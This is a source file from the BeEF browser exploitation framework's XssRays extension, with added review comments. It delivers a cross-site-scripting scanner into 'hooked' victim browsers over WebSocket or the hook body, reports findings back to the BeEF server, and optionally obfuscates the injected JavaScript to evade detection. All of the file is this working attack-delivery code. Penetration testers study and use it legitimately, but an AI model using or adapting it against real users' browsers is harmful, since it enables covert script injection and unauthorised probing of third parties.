GitHub Repository: beefproject/beef
Path: blob/master/extensions/xssrays/api/scan.rb
#
# Copyright (c) 2006-2025 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Xssrays
module API
class Scan
  include BeEF::Core::Handlers::Modules::BeEFJS

  #
  # Add the xssrays main JS file to the victim DOM if there is a not-yet-started scan entry in the db.
  #
  # Looks up the first Xssraysscan row for this hooked browser that is not yet started, marks it
  # started, and delivers the `beef.net.xssrays` component together with a startScan() call: over
  # the WebSocket channel when it is enabled and a socket exists for the session, otherwise by
  # adding the component to the hook file and appending the call to the hook body (XHR polling).
  # Does nothing when no pending scan exists.
  #
  # @param hb hooked browser record; it is re-fetched from the db by id so the persisted row is used
  # @param body hook body being assembled by the caller; kept in @body and appended to in place
  #   with <<, so the caller's object is mutated
  # @return the return value is not meaningful; results are delivered through @body / the WebSocket
  #
  def start_scan(hb, body)
    @body = body
    config = BeEF::Core::Configuration.instance
    # Reload from the db so the rest of the method works on the persisted record.
    hb = BeEF::Core::Models::HookedBrowser.find(hb.id)
    # TODO: we should get the xssrays_scan table with more accuracy, if for some reasons we requested
    # TODO: 2 scans on the same hooked browsers, "first" could not get the right result we want
    xs = BeEF::Core::Models::Xssraysscan.where(hooked_browser_id: hb.id, is_started: false).first

    # stop here if there are no XssRays scans to be started
    # (the is_started test repeats the where clause above; it only acts as a belt-and-braces guard)
    return if xs.nil? || xs.is_started == true

    # set the scan as started
    xs.update(is_started: true)

    # build the beefjs xssrays component

    # the URI of the XssRays handler where rays should come back if the vulnerability is verified
    beefurl = BeEF::Core::Server.instance.url
    cross_origin = xs.cross_origin
    timeout = xs.clean_timeout

    ws = BeEF::Core::Websocket::Websocket.instance

    # TODO: antisnatchor: prevent sending "content" multiple times.
    # Better leaving it after the first run, and don't send it again.
    # todo antisnatchor: remove this gsub crap adding some hook packing.

    # If we use WebSockets, just reply wih the component contents
    if config.get('beef.http.websocket.enable') && ws.getsocket(hb.session)
      # Strip the licence banner from the component source before sending it.
      # NOTE(review): the pattern has no space in "2006-2025Wade"; if the component's banner is
      # written like the header of this file ("2006-2025 Wade"), gsub matches nothing and the
      # banner is sent unchanged -- confirm against the component source.
      content = File.read(find_beefjs_component_path('beef.net.xssrays')).gsub('//
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file \'doc/COPYING\' for copying permission
//', '')
      add_to_body xs.id, hb.session, beefurl, cross_origin, timeout

      # @body now carries the startScan() call; the component is placed in front of it so the
      # function exists when the call runs.
      if config.get('beef.extension.evasion.enable')
        evasion = BeEF::Extension::Evasion::Evasion.instance
        ws.send(evasion.obfuscate(content) + @body, hb.session)
      else
        ws.send(content + @body, hb.session)
      end
    # If we use XHR-polling, add the component to the main hook file
    else
      build_missing_beefjs_components 'beef.net.xssrays'
      add_to_body xs.id, hb.session, beefurl, cross_origin, timeout
    end

    print_debug("[XSSRAYS] Adding XssRays to the DOM. Scan id [#{xs.id}], started at [#{xs.scan_start}], cross origin [#{cross_origin}], clean timeout [#{timeout}].")
  end

  #
  # Append the JavaScript call that starts an XssRays scan to @body, obfuscating it first when the
  # evasion extension is enabled.
  #
  # All five arguments are interpolated verbatim into the generated JavaScript; no quoting or
  # escaping is applied, so the values are expected to be exactly what start_scan supplies
  # (db-sourced scan id and options, the hooked browser session and the server URL). A value
  # containing a quote or other JS syntax would break the generated snippet.
  #
  # @param id scan id (Xssraysscan#id), emitted inside single quotes
  # @param session hooked browser session, emitted inside single quotes
  # @param beefurl BeEF server URL the rays report back to, emitted inside single quotes
  # @param cross_origin scan option (Xssraysscan#cross_origin), emitted unquoted
  # @param timeout clean timeout (Xssraysscan#clean_timeout), emitted unquoted
  # @return the result of `@body << ...` (the receiver itself when @body is a String)
  #
  def add_to_body(id, session, beefurl, cross_origin, timeout)
    config = BeEF::Core::Configuration.instance

    req = %{
      beef.execute(function() {
        beef.net.xssrays.startScan('#{id}', '#{session}', '#{beefurl}', #{cross_origin}, #{timeout});
      });
    }

    if config.get('beef.extension.evasion.enable')
      evasion = BeEF::Extension::Evasion::Evasion.instance
      @body << evasion.obfuscate(req)
    else
      @body << req
    end
  end
end
end
end
end
end